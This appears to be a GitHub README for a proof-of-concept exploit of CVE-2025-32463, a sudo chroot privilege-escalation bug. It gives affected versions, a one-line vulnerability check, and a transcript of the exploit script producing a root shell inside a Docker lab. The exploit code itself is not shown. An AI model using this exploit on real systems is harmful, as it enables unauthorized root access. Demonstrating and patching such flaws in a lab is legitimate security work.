Skip to content

Latest commit

 

History

History
81 lines (58 loc) · 2.76 KB

File metadata and controls

81 lines (58 loc) · 2.76 KB

CVE-2025-32463 – sudo chroot ("chwoot") PoC

This repository provides a minimal, reproducible environment to demonstrate the CVE‑2025‑32463 privilege‑escalation flaw in sudo’s chroot feature.


Affected Versions

Vulnerable builds of sudo 1.9.14 up to 1.9.17 (all p‑revisions) on most Linux distributions are affected.

Security Pages


Contents

File Purpose
Dockerfile Builds an Ubuntu 24.04 image with vulnerable sudo 1.9.16p2 and build tools
sudo‑chwoot.sh Proof‑of‑concept exploit that spawns a root shell inside the chroot
run.sh Helper script that builds the image (if needed) and launches the exploit container

Quick vulnerability check

# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot

Test exploit in Docker container

# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh

# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#

run.sh passes --privileged and --rm to Docker so the container cleans itself up when you exit.


Clean Up

Remove the image when you’re done:

docker rmi sudo-chwoot

Reference